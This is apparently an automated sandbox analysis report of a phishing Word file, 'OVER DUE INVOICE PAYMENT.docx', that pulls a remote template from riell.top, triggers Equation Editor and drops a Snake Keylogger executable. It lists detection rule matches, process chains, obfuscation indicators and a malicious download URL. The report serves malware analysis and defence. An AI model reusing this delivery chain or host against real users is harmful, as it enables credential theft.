Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000009.00000002.374594204.0000000000780000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91894CAD.doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\obb[1].doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, zi--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, zi--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, zi--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, zi--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.780000.2.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: 9.2.obi23456.scr.780000.2.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOCX@6/19@38/6

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ER DUE INVOICE PAYMENT.docx

Jump to behavior

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR6F93.tmp

Jump to behavior

Source: OVER DUE INVOICE PAYMENT.docx

OLE indicator, Word Document stream: true

Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: OVER DUE INVOICE PAYMENT.docx	ReversingLabs: Detection: 34%
Source: OVER DUE INVOICE PAYMENT.docx	Virustotal: Detection: 26%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: gpapi.dll	Jump to behavior

Source: OVER DUE INVOICE PAYMENT.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\OVER DUE INVOICE PAYMENT.docx

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\obi23456.scr

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: OVER DUE INVOICE PAYMENT.docx

Initial sample: OLE zip file path = word/_rels/settings.xml.rels

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: OVER DUE INVOICE PAYMENT.docx

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

.NET source code contains potential unpacker

Source: obb[1].scr.8.dr, ----.cs	.Net Code: CreateProvider
Source: obi23456.scr.8.dr, ----.cs	.Net Code: CreateProvider

Binary contains a suspicious time stamp

Source: obb[1].scr.8.dr

Static PE information: 0x922C3AB8 [Tue Sep 17 22:29:12 2047 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_00568F60 push eax; retf	8_2_00568F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_00570F60 push eax; retn 0056h	8_2_00570F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_00574115 push ebp; ret	8_2_00574117
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_0057410D push ebp; ret	8_2_0057410F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_005758DF push ecx; ret	8_2_005758E3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_005758D8 push ecx; ret	8_2_005758DB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_005601F4 push eax; retf	8_2_005601F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_00575880 push ecx; ret	8_2_00575883
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_0056418D push eax; iretd	8_2_0056468E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_005740AD push ecx; ret	8_2_005740AF

Source: obb[1].scr.8.dr	Static PE information: section name: .text entropy: 7.37475269907409
Source: obi23456.scr.8.dr	Static PE information: section name: .text entropy: 7.37475269907409

Persistence and Installation Behavior

Microsoft Office launches external ms-search protocol handler (WebDAV)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\riell.top@SSL\DavWWWRoot			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\riell.top@SSL\DavWWWRoot			Jump to behavior

Contains an external reference to another file

Source: settings.xml.rels

Extracted files from sample: https://riell.top/obb.doc

Drops PE files with a suspicious file extension

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\obi23456.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr			Jump to dropped file

Office drops RTF file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File dump: obb[1].doc.0.dr			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File dump: 91894CAD.doc.0.dr			Jump to dropped file

Office viewer loads remote template

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\obi23456.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr			Jump to dropped file

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
